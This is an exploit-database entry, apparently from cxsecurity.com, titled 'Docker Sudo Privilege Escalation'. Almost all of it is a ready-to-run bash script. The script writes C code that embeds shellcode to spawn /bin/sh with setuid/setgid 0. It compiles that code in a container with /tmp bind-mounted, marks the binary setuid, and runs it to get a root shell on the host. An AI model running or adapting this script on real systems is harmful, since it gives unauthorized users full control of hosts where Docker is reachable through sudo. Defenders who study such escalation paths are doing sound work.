Docker Sudo Privilege Escalation

2018.01.18
Credit: Pype
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-264

#!/bin/bash # SUDO Docker Privilege Escalation # https://github.com/pyperanger/dockerevil # SELINUX "bypass" using :z option # https://docs.docker.com/engine/admin/volumes/bind-mounts/#configure-the-selinux-label echo "[*] SUDO Docker Privilege Escalation"; echo "[+] Writing shellcode"; cat > /tmp/sud0-d0ck3r.c <<'EOF' #include <unistd.h> #include <stdlib.h> unsigned char shellcode[] = \ "\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"; int main() { setgid(0); setuid(0); int (*ret)() = (int(*)())shellcode; ret(); } EOF echo "[+] Compiling shellcode in container"; sudo docker run -t -v /tmp/:/tmp/:z pype/ubuntu_gcc /bin/sh -c 'gcc -fno-stack-protector -z execstack /tmp/sud0-d0ck3r.c -o /tmp/sud0-d0ck3r && chmod +xs /tmp/sud0-d0ck3r' echo "[+] r00t sh3ll !"; /tmp/sud0-d0ck3r

References:

https://docs.docker.com/engine/admin/volumes/bind-mounts/#configure-the-selinux-label


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top